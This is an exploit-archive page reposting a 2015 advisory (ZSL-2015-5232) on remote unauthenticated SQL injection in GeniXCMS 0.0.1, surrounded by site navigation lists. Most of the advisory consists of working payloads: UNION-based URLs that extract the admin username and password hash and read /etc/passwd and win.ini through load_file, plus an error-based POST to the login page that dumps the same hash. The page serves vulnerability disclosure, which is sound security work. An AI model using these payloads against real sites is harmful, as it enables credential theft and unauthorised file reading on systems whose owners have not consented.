GeniXCMS 0.0.1 SQL Injection

GeniXCMS 0.0.1 SQL Injection: Posted Mar 11, 2015; Authored by LiquidWorm | Site zeroscience.mk; GeniXCMS version 0.0.1 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | c2e1a3a8f9a6e066f72bd3dd728e7366cce9678d505ad005514358b2eddd2cdb; Download | Favorite | View

GeniXCMS 0.0.1 SQL Injection


GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploit

Vendor: MetalGenix
Product web page: http://www.genixcms.org
Affected version: 0.0.1

Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).
It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to
Advanced Developer. Some manual configurations are needed to make this application to
work.

Desc: Input passed via the 'page' GET parameter and the 'username' POST parameter is not
properly sanitised before being used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.

Tested on: nginx/1.4.6 (Ubuntu)
           Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5232
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5232.php


05.03.2015

---


Get admin user/pass hash:
-------------------------

http://localhost/genixcms/index.php?page=1' union all select 1,2,(select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ,4,5,6,7,8,9,10 and 'j'='j



Read file (C:\windows\win.ini) and MySQL version:
-------------------------------------------------

http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x433a5c77696e646f77735c77696e2e696e69),4,@@version,6,7,8,9,10 and 'j'='j



Read file (/etc/passwd) and MySQL version:
------------------------------------------

http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x2f6574632f706173737764),4,@@version,6,7,8,9,10 and 'j'='j



Get admin user/pass hash:
-------------------------

POST /genixcms/gxadmin/login.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Accept: */*
User-Agent: ZSLScan_1.4
Connection: Close

password=1&username=' and(select 1 from(select count(*),concat((select (select (select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1&login=

Top Authors In Last 30 Days

Red Hat 250 files
Ubuntu 62 files
Debian 22 files
Apple 14 files
LiquidWorm 12 files
Gentoo 8 files
Google Security Research 4 files
Alter Prime 3 files
Jann Horn 3 files
Andrey Stoykov 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,169)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,011)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,372)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,008)
UNIX (9,481)
UnixWare (188)
Windows (6,785)
Other

GeniXCMS 0.0.1 SQL Injection

GeniXCMS 0.0.1 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

GeniXCMS 0.0.1 SQL Injection

Share This

GeniXCMS 0.0.1 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems